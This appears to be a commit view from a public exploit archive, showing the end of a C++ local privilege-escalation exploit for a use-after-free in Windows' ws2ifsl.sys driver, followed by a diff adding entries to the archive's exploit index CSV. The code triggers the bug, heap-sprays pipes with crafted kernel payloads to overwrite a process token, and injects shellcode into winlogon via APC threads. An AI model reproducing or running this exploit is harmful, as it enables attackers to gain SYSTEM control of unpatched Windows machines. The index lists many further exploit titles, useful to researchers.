while (1)
{
Sleep(0x1000);
}
}
else
{
Sleep(1);
}
}
return 0;
}
/*
After the bug is triggerd the second thime, this threads gets notified and it will trigger its function pointer again and write the second 8 bytes.
After that the shellcode is injected into the system process.
*/
DWORD WINAPI APCThread2(LPVOID lparam)
{
SetEvent(g_Event2);
while (1)
{
if (g_done2)
{
printf("[+] triggering second APC execution\n");
g_NtTestAlert();
InjectToWinlogon();
SetEvent(g_Event3);
while (1)
{
Sleep(0x1000);
}
}
else
{
Sleep(1);
}
}
return 0;
}
HANDLE CreateSocketHandle(HANDLE procHandle)
{
HANDLE fileHandle = 0;
UNICODE_STRING deviceName;
OBJECT_ATTRIBUTES object;
IO_STATUS_BLOCK IoStatusBlock;
RtlInitUnicodeString(&deviceName, (PWSTR)L"\\Device\\WS2IFSL\\NifsSct");
InitializeObjectAttributes(&object, &deviceName, 0, NULL, NULL);
FILE_FULL_EA_INFORMATION* eaBuffer = (FILE_FULL_EA_INFORMATION*)malloc(sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") + sizeof(SOCK_DATA));
if (!eaBuffer)
{
printf("[-] malloc error\n");
return fileHandle;
}
eaBuffer->NextEntryOffset = 0;
eaBuffer->Flags = 0;
eaBuffer->EaNameLength = sizeof("NifsSct") - 1;
eaBuffer->EaValueLength = sizeof(SOCK_DATA);
RtlCopyMemory(eaBuffer->EaName, "NifsSct", (SIZE_T)eaBuffer->EaNameLength + 1);
SOCK_DATA * eaData = (SOCK_DATA*)(((char*)eaBuffer) + sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") - 4);
eaData->unknown = (void*) 0x242424224;
eaData->procDataHandle = (void*) procHandle;
NTSTATUS status = NtCreateFile(&fileHandle, GENERIC_WRITE, &object, &IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, 0, eaBuffer, sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") + sizeof(PROC_DATA));
if (status != STATUS_SUCCESS)
{
printf("[-] NtCreateFile error: %x \n", status);
free(eaBuffer);
return fileHandle;
}
free(eaBuffer);
return fileHandle;
}
HANDLE CreateProcessHandle(HANDLE hAPCThread)
{
HANDLE fileHandle = 0;
UNICODE_STRING deviceName;
OBJECT_ATTRIBUTES object;
IO_STATUS_BLOCK IoStatusBlock;
RtlInitUnicodeString(&deviceName, (PWSTR)L"\\Device\\WS2IFSL\\NifsPvd");
InitializeObjectAttributes(&object, &deviceName, 0, NULL, NULL);
FILE_FULL_EA_INFORMATION* eaBuffer = (FILE_FULL_EA_INFORMATION*)malloc(sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") + sizeof(PROC_DATA));
if (!eaBuffer)
{
printf("[-] malloc error\n");
return fileHandle;
}
eaBuffer->NextEntryOffset = 0;
eaBuffer->Flags = 0;
eaBuffer->EaNameLength = sizeof("NifsPvd") - 1;
eaBuffer->EaValueLength = sizeof(PROC_DATA);
RtlCopyMemory(eaBuffer->EaName, "NifsPvd", (SIZE_T)eaBuffer->EaNameLength + 1);
PROC_DATA * eaData = (PROC_DATA*)(((char*)eaBuffer) + sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") - 4);
if (!hAPCThread)
{
printf("[-] error thread not found\n");
free(eaBuffer);
return 0;
}
eaData->apcthread = (void*) hAPCThread; // thread must be in current process
eaData->unknown1 = (void*) 0x2222222; // APC Routine
eaData->unknown2 = (void*) 0x3333333; // cancel Rundown Routine
eaData->unknown3 = (void*) 0x4444444;
eaData->unknown4 = (void*) 0x5555555;
NTSTATUS status = NtCreateFile(&fileHandle, MAXIMUM_ALLOWED, &object, &IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, 0, eaBuffer, sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") + sizeof(PROC_DATA));
if (status != STATUS_SUCCESS)
{
printf("[-] NtCreateFile error: %x \n", status);
free(eaBuffer);
return fileHandle;
}
free(eaBuffer);
return fileHandle;
}
int DoHeapSpray(DWORD64 writeAddress, DWORD64 kthreadAddress)
{
DWORD64 nopPointer = GetGadgetAddr("xHalTimerWatchdogStop");
if (!nopPointer)
{
printf("[-] SeSetAccessStateGenericMapping not found\n");
return 0;
}
DWORD64 funPointer = GetGadgetAddr("SeSetAccessStateGenericMapping");
if (!funPointer)
{
printf("[-] SeSetAccessStateGenericMapping not found\n");
return 0;
}
UCHAR payload[0x120 - 0x48];
memset(payload, 0x0, sizeof(payload));
DWORD64 x = 0x41414141414141;
memcpy(payload, &x, 8);
x = 0x12121212;
memcpy(payload + 8, &x, 8);
x = kthreadAddress + OFFSET_LINKEDLIST; // apc linked list
memcpy(payload + 0x10, &x, 8);
x = kthreadAddress + OFFSET_LINKEDLIST;
memcpy(payload + 0x18, &x, 8);
x = funPointer;
memcpy(payload + 0x20, &x, 8); // this is the RIP we want to execute, in case of NtTestAlert
x = nopPointer;
memcpy(payload + 0x28, &x, 8); // this is the RIP we want to execute, in case of rundown routine
x = 0xffffffffffffffff; // this is to be written
memcpy(payload + 0x30, &x, 8);
x = 0xffffffffffffffff; // this is to be written, but it gets changed..
memcpy(payload + 0x38, &x, 8);
x = 0x2424242424242424;
memcpy(payload + 0x40, &x, 8);
x = writeAddress; // this is where to write
memcpy(payload + 0x48, &x, 8);
for (size_t i = 0; i < 0x70; i++)
{
HANDLE readPipe;
HANDLE writePipe;
DWORD resultLength = 0;
BOOL res = CreatePipe(&readPipe, &writePipe, NULL, sizeof(payload));
if (!res)
{
printf("[-] error creating pipe\n");
return 0;
}
res = WriteFile(writePipe, payload, sizeof(payload), &resultLength, NULL);
}
return 1;
}
/*
This function will trigger the use after free in ws2ifsl.sys and
will try to reallocate the buffer with controlled content.
*/
void TriggerBug(HANDLE threadHandle, DWORD64 writeAddress, DWORD64 kthreadAddress, int id)
{
HANDLE procHandle = CreateProcessHandle(threadHandle);
printf("[!] procHandle %x\n", (DWORD)procHandle);
HANDLE sockHandle = CreateSocketHandle(procHandle);
printf("[!] sockHandle %x\n", (DWORD)sockHandle);
char* readBuffer = (char*)malloc(0x100);
DWORD bytesRead = 0;
IO_STATUS_BLOCK io;
LARGE_INTEGER byteOffset;
byteOffset.HighPart = 0;
byteOffset.LowPart = 0;
byteOffset.QuadPart = 0;
byteOffset.u.LowPart = 0;
byteOffset.u.HighPart = 0;
ULONG key = 0;
CloseHandle(procHandle);
NTSTATUS ret = g_NtWriteFile(sockHandle, 0, 0, 0, &io, readBuffer, 0x100, &byteOffset, &key);
// this close the objecte and we trigger the use after free
CloseHandle(sockHandle);
// this spray will reclaim the buffer
if (!DoHeapSpray(writeAddress, kthreadAddress))
{
printf("[-] error doHeapSpray\n");
return;
}
if (id == 1)
{
g_done1 = 1;
}
if (id == 2)
{
g_done2 = 1;
}
printf("[+] done\n");
Sleep(0x20);
free(readBuffer);
return;
}
/*
This function resolves all function pointer for native api calls.
*/
bool InitFunctionPointers()
{
HMODULE hNtDll = NULL;
hNtDll = LoadLibrary("ntdll.dll");
if (!hNtDll)
{
printf("error\n");
return false;
}
g_NtTestAlert = (NtTestAlert_t)GetProcAddress(hNtDll, "NtTestAlert");
if (!g_NtTestAlert)
{
printf("error\n");
return false;
}
g_NtWriteFile = (NtWriteFile_t)GetProcAddress(hNtDll, "NtWriteFile");
if (!g_NtWriteFile)
{
printf("[-] GetProcAddress() NtWriteFile failed.\n");
return false;
}
g_RtlGetVersion = (RtlGetVersion_t)GetProcAddress(hNtDll, "RtlGetVersion");
if (!g_NtWriteFile)
{
printf("[-] GetProcAddress() RtlGetVersion failed.\n");
return false;
}
return true;
}
int main()
{
// intialize event for thread synchronization
g_Event1 = CreateEvent(0, 0, 0, 0);
g_Event2 = CreateEvent(0, 0, 0, 0);
g_Event3 = CreateEvent(0, 0, 0, 0);
if (g_Event1 == INVALID_HANDLE_VALUE || !g_Event1)
{
printf("[-] CreateEvent failed\n");
return 0;
}
if (g_Event2 == INVALID_HANDLE_VALUE || !g_Event2)
{
printf("[-] CreateEvent failed\n");
return 0;
}
if (g_Event3 == INVALID_HANDLE_VALUE || !g_Event2)
{
printf("[-] CreateEvent failed\n");
return 0;
}
if (!InitFunctionPointers())
{
printf("[-] InitFunctionPointers failed\n");
return 0;
}
HANDLE proc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId());
if (!proc)
{
printf("[-] OpenProcess failed\n");
return 0;
}
HANDLE token = 0;
if (!OpenProcessToken(proc, TOKEN_ADJUST_PRIVILEGES, &token))
{
printf("[-] OpenProcessToken failed\n");
return 0;
}
DWORD64 ktoken = GetKernelPointer(token, 0x5);
DWORD64 where = ktoken + TOKEN_OFFSET;
printf("[+] found token at: %p\n", (DWORD64) ktoken);
// check the supported version of this exploit, otherwise we would crash
RTL_OSVERSIONINFOW osversion;
g_RtlGetVersion(&osversion);
if (osversion.dwMajorVersion == 10 && osversion.dwBuildNumber == 18362)
{
printf("[+] version supported\n");
}
else
{
printf("[-] sorry version not supported\n");
return 0;
}
HANDLE hAPCThread1 = CreateThread(0, 0, APCThread1, 0, 0, 0);
if (hAPCThread1 == INVALID_HANDLE_VALUE || !hAPCThread1)
{
printf("[-] error CreateThread\n");
return 0;
}
HANDLE hAPCThread2 = CreateThread(0, 0, APCThread2, 0, 0, 0);
if (hAPCThread2 == INVALID_HANDLE_VALUE || !hAPCThread2)
{
printf("[-] error CreateThread\n");
return 0;
}
DWORD64 threadAddrAPC1 = GetKernelPointer(hAPCThread1, 0x8);
if (!threadAddrAPC1)
{
printf("[-] GetKernelPointer error \n");
return 0;
}
DWORD64 threadAddrAPC2 = GetKernelPointer(hAPCThread2, 0x8);
if (!threadAddrAPC2)
{
printf("[-] GetKernelPointer error \n");
return 0;
}
// wait for threads to be initialized
WaitForSingleObject(g_Event1, -1);
WaitForSingleObject(g_Event2, -1);
TriggerBug(hAPCThread1, where-8, threadAddrAPC1, 1);
TriggerBug(hAPCThread2, where, threadAddrAPC2, 2);
WaitForSingleObject(g_Event3, -1);
ExitProcess(0);
return 0;
}

22
files_exploits.csv
View file

@ -10902,6 +10902,9 @@ id,file,description,date,author,type,platform,port
47910,exploits/windows/local/47910.py,"Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)",2020-01-13,antonio,local,windows,
47915,exploits/windows/local/47915.py,"Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)",2020-01-13,"Nassim Asrir",local,windows,
47916,exploits/windows/local/47916.txt,"VPN unlimited 6.1 - Unquoted Service Path",2020-01-14,"Amin Rawah",local,windows,
47932,exploits/multiple/local/47932.c,"SunOS 5.10 Generic_147148-26 - Local Privilege Escalation",2020-01-16,"Marco Ivaldi",local,multiple,
47933,exploits/windows/local/47933.rb,"Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate",2020-01-15,"Oliver Lyak",local,windows,
47935,exploits/windows_x86-64/local/47935.cpp,"Microsoft Windows 10 (19H1 1901 x64) - 'ws2ifsl.sys' Use After Free Local Privilege Escalation (kASLR kCFG SMEP)",2020-01-07,bluefrostsec,local,windows_x86-64,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17930,6 +17933,7 @@ id,file,description,date,author,type,platform,port
47889,exploits/linux/remote/47889.txt,"ASTPP VoIP 4.0.1 - Remote Code Execution",2020-01-08,"Fabien AUNAY",remote,linux,
47891,exploits/java/remote/47891.txt,"JetBrains TeamCity 2018.2.4 - Remote Code Execution",2020-01-08,hantwister,remote,java,
47924,exploits/linux/remote/47924.rb,"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)",2020-01-15,Metasploit,remote,linux,
47936,exploits/hardware/remote/47936.js,"Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution",2020-01-15,Lyrebirds,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -27862,7 +27866,7 @@ id,file,description,date,author,type,platform,port
21206,exploits/php/webapps/21206.txt,"PHP-Nuke AddOn PHPToNuke.php 1.0 - Cross-Site Scripting",2002-01-06,frog,webapps,php,
21208,exploits/cgi/webapps/21208.txt,"YaBB 9.1.2000 - Cross-Agent Scripting",2002-01-09,Obscure,webapps,cgi,
21209,exploits/cgi/webapps/21209.txt,"Ultimate Bulletin Board 5.4/6.0/6.2 - Cross-Agent Scripting",2002-01-09,Obscure,webapps,cgi,
21220,exploits/php/webapps/21220.txt,"VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Sepahan TelCom IT Group",webapps,php,
21220,exploits/php/webapps/21220.txt,"VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Ertebat Gostar Co",webapps,php,
21221,exploits/php/webapps/21221.txt,"Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection",2012-09-10,Yarolinux,webapps,php,
21222,exploits/php/webapps/21222.txt,"SiteGo - Remote File Inclusion",2012-09-10,L0n3ly-H34rT,webapps,php,
21230,exploits/php/webapps/21230.txt,"PHP-Nuke 4.x/5.x - Arbitrary File Inclusion",2002-01-16,"Handle Nopman",webapps,php,
@ -36514,7 +36518,7 @@ id,file,description,date,author,type,platform,port
35904,exploits/jsp/webapps/35904.txt,"ManageEngine ServiceDesk Plus 9.0 < Build 9031 - User Privileges Management",2015-01-26,"Rewterz - Research Group",webapps,jsp,
35906,exploits/php/webapps/35906.txt,"PHP Webquest 2.6 - SQL Injection",2015-01-26,"jordan root",webapps,php,
35908,exploits/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,webapps,multiple,
35910,exploits/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting",2015-01-26,"Sepahan TelCom IT Group",webapps,jsp,
35910,exploits/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting",2015-01-26,"Ertebat Gostar Co",webapps,jsp,
35911,exploits/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",webapps,multiple,
36313,exploits/php/webapps/36313.txt,"webERP 4.3.8 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-17,"High-Tech Bridge SA",webapps,php,
35982,exploits/windows/webapps/35982.txt,"Hewlett-Packard (HP) UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",webapps,windows,8080
@ -36532,7 +36536,7 @@ id,file,description,date,author,type,platform,port
35929,exploits/php/webapps/35929.txt,"Joomla! Component com_voj - SQL Injection",2011-07-08,CoBRa_21,webapps,php,
35930,exploits/php/webapps/35930.txt,"Prontus CMS - 'page' Cross-Site Scripting",2011-07-11,Zerial,webapps,php,
35931,exploits/php/webapps/35931.txt,"ICMusic 1.2 - 'music_id' SQL Injection",2011-07-11,kaMtiEz,webapps,php,
35933,exploits/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",2015-01-29,"Sepahan TelCom IT Group",webapps,hardware,
35933,exploits/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",2015-01-29,"Ertebat Gostar Co",webapps,hardware,
35940,exploits/php/webapps/35940.txt,"Sphider 1.3.x - Admin Panel Multiple SQL Injections",2011-07-12,"Karthik R",webapps,php,
35941,exploits/multiple/webapps/35941.txt,"Flowplayer 3.2.7 - 'linkUrl' Cross-Site Scripting",2011-07-12,"Szymon Gruszecki",webapps,multiple,
35942,exploits/php/webapps/35942.txt,"TCExam 11.2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,"Gjoko Krstic",webapps,php,
@ -37752,7 +37756,7 @@ id,file,description,date,author,type,platform,port
37781,exploits/php/webapps/37781.txt,"Extcalendar 2.0 - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",webapps,php,
37782,exploits/php/webapps/37782.txt,"web@all - Local File Inclusion / Multiple Arbitrary File Upload Vulnerabilities",2012-09-06,KedAns-Dz,webapps,php,
37784,exploits/php/webapps/37784.txt,"Pinterestclones - Security Bypass / HTML Injection",2012-09-08,DaOne,webapps,php,
37785,exploits/php/webapps/37785.txt,"VICIDIAL Call Center Suite - Multiple SQL Injections",2012-09-10,"Sepahan TelCom IT Group",webapps,php,
37785,exploits/php/webapps/37785.txt,"VICIDIAL Call Center Suite - Multiple SQL Injections",2012-09-10,"Ertebat Gostar Co",webapps,php,
37786,exploits/php/webapps/37786.txt,"DELTAScripts PHP Links - Multiple SQL Injections",2012-09-10,L0n3ly-H34rT,webapps,php,
37787,exploits/php/webapps/37787.txt,"WordPress Plugin Download Monitor - 'dlsearch' Cross-Site Scripting",2012-08-30,"Chris Cooper",webapps,php,
37789,exploits/php/webapps/37789.txt,"OpenFiler 2.3 - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",webapps,php,
@ -42223,5 +42227,13 @@ id,file,description,date,author,type,platform,port
47914,exploits/php/webapps/47914.txt,"Digi AnywhereUSB 14 - Reflective Cross-Site Scripting",2020-01-13,"Raspina Net Pars Group",webapps,php,
47917,exploits/hardware/webapps/47917.txt,"IBM RICOH InfoPrint 6500 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware,
47918,exploits/hardware/webapps/47918.txt,"IBM RICOH 6400 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware,
47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Sepahan TelCom IT Group",webapps,php,
47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Ertebat Gostar Co",webapps,php,
47923,exploits/hardware/webapps/47923.rb,"Huawei HG255 - Directory Traversal ( Metasploit )",2020-01-15,"Ismail Tasdelen",webapps,hardware,
47925,exploits/php/webapps/47925.txt,"WordPress Plugin Postie 1.9.40 - Persistent Cross-Site Scripting",2020-01-16,V1n1v131r4,webapps,php,
47926,exploits/php/webapps/47926.txt,"Rukovoditel Project Management CRM 2.5.2 - 'reports_id' SQL Injection",2020-01-16,"Fatih Çelik",webapps,php,
47927,exploits/java/webapps/47927.txt,"Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting",2020-01-16,"Ai Ho",webapps,java,
47928,exploits/php/webapps/47928.txt,"Online Book Store 1.0 - Arbitrary File Upload",2020-01-16,Or4nG.M4N,webapps,php,
47929,exploits/multiple/webapps/47929.rb,"Tautulli 2.1.9 - Denial of Service ( Metasploit )",2020-01-16,"Ismail Tasdelen",webapps,multiple,
47930,exploits/multiple/webapps/47930.txt,"Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal",2020-01-16,"Dhiraj Mishra",webapps,multiple,
47931,exploits/php/webapps/47931.txt,"Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection",2020-01-16,"Fatih Çelik",webapps,php,
47934,exploits/php/webapps/47934.txt,"Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection",2020-01-16,"Fatih Çelik",webapps,php,

Can't render this file because it is too large.